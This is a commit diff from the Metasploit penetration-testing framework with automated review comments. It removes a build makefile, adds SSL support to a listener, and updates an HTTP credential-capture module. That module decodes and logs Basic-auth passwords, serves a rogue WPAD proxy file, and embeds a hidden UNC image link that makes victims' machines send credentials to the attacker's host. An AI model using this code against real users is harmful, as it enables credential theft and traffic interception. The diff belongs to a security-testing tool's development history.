Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree

git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-03-22 06:34:52 +00:00
parent 8138c2259f
commit 1ea29ba8f0
4 changed files with 42 additions and 165 deletions


@ -1,142 +0,0 @@
SHELL = /bin/sh
#### Start of system configuration section. ####
srcdir = .
topdir = /usr/lib/ruby/1.8/i686-linux
hdrdir = $(topdir)
VPATH = $(srcdir):$(topdir):$(hdrdir)
prefix = $(DESTDIR)/usr
exec_prefix = $(DESTDIR)/usr
sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby
rubylibdir = $(libdir)/ruby/$(ruby_version)
archdir = $(rubylibdir)/$(arch)
sbindir = $(exec_prefix)/sbin
datadir = $(DESTDIR)/usr/share
includedir = $(prefix)/include
infodir = $(DESTDIR)/usr/share/info
sysconfdir = $(DESTDIR)/etc
mandir = $(DESTDIR)/usr/share/man
libdir = $(DESTDIR)/usr/lib
sharedstatedir = $(prefix)/com
oldincludedir = $(DESTDIR)/usr/include
sitearchdir = $(sitelibdir)/$(sitearch)
bindir = $(exec_prefix)/bin
localstatedir = $(DESTDIR)/var/lib
sitelibdir = $(sitedir)/$(ruby_version)
libexecdir = $(exec_prefix)/libexec
CC = i686-pc-linux-gnu-gcc
LIBRUBY = $(LIBRUBY_SO)
LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a
LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME)
LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static
RUBY_EXTCONF_H =
CFLAGS = -fPIC -O2 -march=pentium4 -fPIC
INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I.
CPPFLAGS =
CXXFLAGS = $(CFLAGS)
DLDFLAGS =
LDSHARED = $(CC) -shared
AR = i686-pc-linux-gnu-ar
EXEEXT =
RUBY_INSTALL_NAME = ruby18
RUBY_SO_NAME = ruby18
arch = i686-linux
sitearch = i686-linux
ruby_version = 1.8
ruby = /usr/bin/ruby18
RUBY = $(ruby)
RM = rm -f
MAKEDIRS = mkdir -p
INSTALL = /bin/install -c
INSTALL_PROG = $(INSTALL) -m 0755
INSTALL_DATA = $(INSTALL) -m 644
COPY = cp
#### End of system configuration section. ####
preload =
libpath = $(libdir)
LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)'
DEFFILE =
CLEANFILES =
DISTCLEANFILES =
extout =
extout_prefix =
target_prefix =
LOCAL_LIBS =
LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc
SRCS = Lorcon.c
OBJS = Lorcon.o
TARGET = Lorcon
DLLIB = $(TARGET).so
EXTSTATIC =
STATIC_LIB =
RUBYCOMMONDIR = $(sitedir)$(target_prefix)
RUBYLIBDIR = $(sitelibdir)$(target_prefix)
RUBYARCHDIR = $(sitearchdir)$(target_prefix)
TARGET_SO = $(DLLIB)
CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map
CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak
all: $(DLLIB)
static: $(STATIC_LIB)
clean:
@-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES)
distclean: clean
@-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log
@-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES)
realclean: distclean
install: install-so install-rb
install-so: $(RUBYARCHDIR)
install-so: $(RUBYARCHDIR)/$(DLLIB)
$(RUBYARCHDIR)/$(DLLIB): $(DLLIB)
$(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR)
install-rb: pre-install-rb install-rb-default
install-rb-default: pre-install-rb-default
pre-install-rb: Makefile
pre-install-rb-default: Makefile
$(RUBYARCHDIR):
$(MAKEDIRS) $@
site-install: site-install-so site-install-rb
site-install-so: install-so
site-install-rb: install-rb
.SUFFIXES: .c .m .cc .cxx .cpp .C .o
.cc.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.cxx.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.cpp.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.C.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.c.o:
$(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $<
$(DLLIB): $(OBJS)
@-$(RM) $@
$(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS)
$(OBJS): ruby.h defines.h


@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer
register_options(
[
Opt::SSL,
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ])
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
], Msf::Exploit::Remote::TcpServer)
register_evasion_options(
@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer
self.service = Rex::Socket::TcpServer.create(
'LocalHost' => srvhost,
'LocalPort' => srvport,
'SSL' => ssl,
'Context' =>
{
'Msf' => framework,
@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer
datastore['SRVPORT']
end
#
# Returns the SSL option
#
def ssl
datastore['SSL']
end
#
# Re-generates the payload, substituting the current RHOST and RPORT with
# the supplied client host and port from the socket.
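Review bot: Registering `Opt::SSL` in the first hunk puts the listener's TLS switch on the shared `SSL` datastore key, which the new `ssl` accessor reads and the second hunk passes to `Rex::Socket::TcpServer.create` as `'SSL' => ssl`. If client-side mixins use the same key for outbound connections (not visible here), a module that includes both would have one flag driving both directions; that is worth confirming, and a server-specific option name considered if so. The accessor's comment could also say where the value goes, e.g. `# Returns the SSL datastore option, passed as 'SSL' to Rex::Socket::TcpServer.create`. The trailing comma added after the `SRVPORT` entry is harmless but stray.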


@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer
def accept(opts = {})
sock = super()
if (sock)
sock.extend(Rex::Socket::Tcp)
sock.context = self.context
pn = sock.getpeername
return nil if not sock
sock.extend(Rex::Socket::Tcp)
sock.context = self.context
pn = sock.getpeername
sock.peerhost = pn[1]
sock.peerport = pn[2]
end
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
t.extend(Rex::Socket::Tcp)
t.accept
t
begin
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
t.extend(Rex::Socket::Tcp)
t.peerhost = pn[1]
t.peerport = pn[2]
t.accept
t
rescue ::OpenSSL::SSL::SSLError
sock.close
nil
end
end
@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer
cert.subject = subject
cert.issuer = issuer
cert.not_before = Time.now
cert.not_after = Time.now + 3600
cert.not_before = Time.now - 7200
cert.not_after = Time.now + 7200
cert.public_key = key.public_key
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
cert.extensions = [
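Review bot: The handshake in `accept` (`t.accept`) runs synchronously with no time limit, so a peer that completes the TCP connect and then sends nothing would hold the listener's accept path until it disconnects. Only `::OpenSSL::SSL::SSLError` is rescued, so a reset or EOF during the handshake, if it surfaces as another exception class, would propagate to the caller with `sock` left open. Consider bounding the handshake with `Timeout.timeout(HANDSHAKE_TIMEOUT) { t.accept }` (placeholder constant, needs `require 'timeout'`) and widening the clause to `rescue ::OpenSSL::SSL::SSLError, ::Timeout::Error, ::SystemCallError, ::EOFError`. Separately, the certificate hunk makes the validity window two hours either side of creation; if the context is built once per listener, a server left running longer than that would present an expired certificate.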


@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end
def run
@myhost = datastore['SRVHOST']
@myport = datastore['SRVPORT']
exploit()
end
@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end
def dispatch_request(cli, req)
mysrc = Rex::Socket.source_address(cli.peerhost)
hhead = (req['Host'] || @myhost).split(':', 2)[0]
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
basic,auth = req['Authorization'].split(/\s+/)
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
report_auth_info(
:host => cli.peerhost,
:proto => 'http',
:targ_host => req['Host'] || datastore['SRVHOST'],
:targ_port => datastore['SRVPORT'],
:targ_host => hhead,
:targ_port => @myport,
:user => user,
:pass => pass,
:extra => req.resource.to_s
)
print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
end
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
res =
"HTTP/1.1 200 OK\r\n" +
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
"Host: #{hhead}\r\n" +
"Content-Type: application/x-ns-proxy-autoconfig\r\n" +
"Content-Length: #{prx.length}\r\n" +
"Connection: Close\r\n\r\n#{prx}"
@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
return
end
print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}")
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
res =
"HTTP/1.1 200 OK\r\n" +
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +